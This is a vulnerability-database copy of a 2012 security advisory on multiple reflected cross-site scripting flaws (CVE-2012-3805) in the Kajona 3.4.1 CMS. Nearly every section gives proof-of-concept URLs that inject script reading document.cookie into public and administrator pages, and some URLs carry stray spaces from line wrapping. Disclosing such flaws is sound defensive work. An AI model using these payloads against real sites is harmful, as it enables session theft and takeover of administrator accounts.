Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23097
HistoryJun 20, 2012 - 12:00 a.m.

Multiple Cross-Site Scripting (XSS) in Kajona

2012-06-2000:00:00
High-Tech Bridge
www.htbridge.com
24

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

66.4%

JSON

High-Tech Bridge Security Research Lab has discovered multiple Cross-Site Scripting (XSS) vulnerabilities in Kajona.

  1. Multiple Cross-Site Scripting (XSS) in Kajona: CVE-2012-3805
    1.1 Input passed via the “absender_name”, “absender_email” and “absender_nachricht” GET parameters to /index.php (when “page” is set to “contact”) is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of affected website.
    The following PoC (Proof of Concept) demonstrate the vulnerabilities:
    http://kajona/index.php?page=contact&amp;absender_name="><script>alert%2 8document.cookie%29;%3C/script%3E
    http://kajona/index.php?page=contact&amp;abse nder_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http: //kajona/index.php?page=contact&absender_nachricht=%3C/textarea%3E%3Cscript% 3Ealert%28document.cookie%29;%3C/script%3E

1.2 Input passed via the “comment_name”, “comment_subject” and “comment_message” GET parameters to /index.php (when “page” is set to “postacomment”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?page=postacomment&amp;comment_name="><script>ale rt%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=postacom ment&comment_subject=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://kajona/index.php?page=postacomment&amp;comment_message=</textarea% 3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.3 Input passed via the “module” GET parameter to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?module=<script>alert(document.cookie);</sc ript%3E

1.4 Input passed via the “action” GET parameter to /index.php (when “module” is set to “login” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?module=login&amp;admin=1&amp;action=<script>alert(docu ment.cookie%29;%3C/script%3E

1.5 Input passed via the “pv” and “pe” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “list” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&amp;module=user&amp;action=list&amp;pv="><script%3 Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&amp;m odule=user&action=list&pe=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E

1.6 Input passed via the “user_username”, “user_email”, “user_forename”, “user_name”, “user_street”, “user_postal”, “user_city”, “user_tel” and “user_mobile” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “newUser” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&amp;module=user&amp;action=newUser&amp;user_username=" %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index .php?admin=1&module=user&action=newUser&user_email=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&amp;module=us er&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
http://kajona/index.php?admin=1&amp;module=user&amp;action=newUser&amp;u ser_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http:// kajona/index.php?admin=1&module=user&action=newUser&user_street=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admi n=1&module=user&action=newUser&user_postal=%22%3E%3Cscript%3Ealert%28documen t.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&amp;module=user&amp;actio n=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E
http://kajona/index.php?admin=1&amp;module=user&amp;action=newUser&amp;user_tel="% 3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index. php?admin=1&module=user&action=newUser&user_mobile=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E

1.7 Input passed via the “group_name” and “group_desc” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “groupNew” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&amp;module=user&amp;action=groupNew&amp;group_name="%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.p hp?admin=1&module=user&action=groupNew&group_desc=%3C/textarea%3E%3Cscript%3 Ealert%28document.cookie%29;%3C/script%3E

1.8 Input passed via the “name”, “browsername”, “seostring”, “keywords” and “folder_id” GET parameters to /index.php (when “module” is set to “pages”, “action” is set to “newPage” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&amp;module=pages&amp;action=newPage&amp;name="><sc ript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?adm in=1&module=pages&action=newPage&browsername=%22%3E%3Cscript%3Ealert%28docum ent.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&amp;module=pages&amp;ac tion=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scri pt%3E
http://kajona/index.php?admin=1&amp;module=pages&amp;action=newPage&amp;keywords= %3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http:// kajona/index.php?admin=1&module=pages&action=newPage&folder_id=%22%3E%3Cscri pt%3Ealert%28document.cookie%29;%3C/script%3E

1.9 Input passed via the “element_name” and “element_cachetime” GET parameters to /index.php (when “module” is set to “pages”, “action” is set to “newElement” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&amp;module=pages&amp;action=newElement&amp;element_name= %22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/in dex.php?admin=1&module=pages&action=newElement&element_cachetime=%22%3E%3Csc ript%3Ealert%28document.cookie%29;%3C/script%3E

1.10 Input passed via the “aspect_name” GET parameter to /index.php (when “module” is set to “system”, “action” is set to “newAspect” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?admin=1&amp;module=system&amp;action=newAspect&amp;aspect_name=% 22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.11 Input passed via the “filemanager_name”, “filemanager_path”, “filemanager_upload_filter” and “filemanager_view_filter” GET parameters to /index.php (when “module” is set to “filemanager”, “action” is set to “newRepo” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&amp;module=filemanager&amp;action=newRepo&amp;filemanage r_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://ka jona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_path=%2 2%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/inde x.php?admin=1&module=filemanager&action=newRepo&filemanager_upload_filter=%2 2%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/inde x.php?admin=1&module=filemanager&action=newRepo&filemanager_view_filter=%22% 3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.12 Input passed via the “archive_title” and “archive_path” GET parameters to /index.php (when “module” is set to “downloads”, “action” is set to “newArchive” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&amp;module=downloads&amp;action=newArchive&amp;archive_t itle=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajo na/index.php?admin=1&module=downloads&action=newArchive&archive_path=%22%3E% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

CPENameOperatorVersion
kajonale3.4.1

Related

securityvulns 2
cve 1
packetstorm 1
prion 1
securityvulns
securityvulns
Multiple Cross-Site Scripting &#40;XSS&#41; in Kajona
2012-07-16 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2012-07-16 00:00:00
cve
cve
CVE-2012-3805
2012-07-12 19:55:00
packetstorm
packetstorm
Kajona 3.4.1 Cross Site Scripting
2012-07-12 00:00:00
prion
prion
Cross site scripting
2012-07-12 19:55:00

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

66.4%

JSON
Related for HTB23097
securityvulns2cve1packetstorm1prion1